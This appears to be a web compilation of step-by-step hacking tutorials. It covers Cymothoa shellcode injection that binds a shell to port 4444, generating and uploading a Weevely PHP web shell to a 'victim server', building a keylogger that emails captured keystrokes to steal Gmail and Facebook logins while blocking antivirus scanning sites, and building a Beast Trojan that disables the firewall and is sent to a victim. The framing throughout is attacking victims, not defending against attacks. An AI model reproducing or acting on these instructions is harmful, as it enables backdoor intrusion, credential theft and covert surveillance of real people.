Cymothoa – Runtime shellcode injection Backdoors

Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them. But keep in mind it’s a runtime injector so it only works on applications that are already running.

Open your backtrack terminal and type cd /pentest/backdoors/cymothoa

Not type. /cymothoa

The main syntax is:  ./cymothoa –p <pid> -s <shellcode_number> [options]

Now type. /cymothoa –S for list of all available shellcodes

To try to infect a currently running process I run to see a list of life processes type ps –aux

I try to launch a version of dictionary to attach on to. /cymothoa –p 1510 –s 0 –y 4444

-p   process ID  1510
-s shell code number 0 bind /bin/sh to the provided port (requires -y)
-4444 that will open up a shell on port 4444

You can potentially inject any type of backdoor into any program or application of the system. Because it’s a realtime process, it only works on systems you have access to. Once compromised, Cymothoa should be copied to the victim machine to generate stealthy backdoor shells.

Now scan pc with nmap: nmap –sV 192.168.1.3 (Victim IP)

How to Create a Backdoor in Server using BackTrack (Weevely Tutorial)

Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application testing post exploitation, and can be used as a stealth backdoor web shell to manage legit web accounts, even free hosted ones. It is currently included in Backtrack and Backbox and other Linux distributions for penetration testing.

Open your backtrack terminal and type cd /pentest/backdoors/web/weevely

 

Now type ./weevely.py generate <password> <location, where u want to save file> .It will look something like this

. / weevely.py generate rajchandel (Password) /root/Desktop

Then upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type ./weevely.py <url> <password> .It will look something like this

. / weevely http://telecallerjobs.com/webdoor.php rajchandel

 

Uname –a – print all information

Free – display information about free and used memory on the system

pwd – print name of current/working directory

Df – displays the amount of disk space available on the filesystem containing each file name argument

W – Displays information about the users currently on the machine, and their processes

Ls – List information about the FILEs (the current directory by default)

How to Hack Gmail Facebook using FUD Keylogger

First Download Project Neptune Keylogger

Open the program 

Double click on the program where you downloaded it

First check the button that says “Use Email for Storing Logs” Then change the amount of time the Keylogger sends logs.

In the Email settings tab keep the “smpt.gmail.com” and the port number 587 where it says “Email to Send Keystroke Logs” put your email in that box and in the box under that put the password to your email. 

If you want you can change what email it send the logs too, but otherwise use the same email that you put above. 

Then, Click Test Email Account Information, and if you get an email saying that it works, then you can move onto the next step. 

Keep all the settings the same, unless you want to disable task manager or block websites now will add some online virus scanning sites to block them —this means that the sites can’t scan the tool for virus.

Go to the installation tab and check the first box in “Startup Settings” Then Choose a place to install in the Installation Directory.

In the Installation Directory I would put it in the “AppData Folder

Then go to Original File Check “Do Nothing with Original File after Install” to keep suspicion level none.

If you want File downloading enabled then type in the link of your exe or other file, but if not then do nothing with this box.

Now go to ‘Server Creation‘ tab and press ‘Generate New Server’ under ‘server creation’, and give name of your Keylogger and that it… You are done.

You have successfully created a Keylogger server file. Now, simply send this file to your victim via email, once the victim runs our Keylogger, we will key logs every 20 min via email

How to use Beast Trojan

Step 1:- Download the necessary software  Beast 2.06

Step 2:- Open the software

Step 3:- Now click on “Build server “button.

 

Step 4:- Now in this window click on the notifications tab.

Step 5:- In the notifications tab click on the e-mail button.

Step 6:- Now In this window fill your proper and valid email id.

Step 7:- Now go to “AV-FW kill” tab.

Step 8: – Now In this put a tick mark on the “disable XP firewall “.

Step 9:-Now click on “EXE icon” tab.

Step 10:- Select any icon and click on the ”Save Server” button and the Trojan will be made.

Step 11:-Now send this Trojan File to victim.

Step 12:- As and when the victim will install the Trojan on his system you will get a notification e-mail on your specified e-mail id while making the Trojan. This Email consists of the IP address and port of the victim.

Step 13:-Put This IP address and Port in the place shown in the below snap-shot.

Step 14:- After That Click on the “Go Beast” Button and You will be connected to victims PC.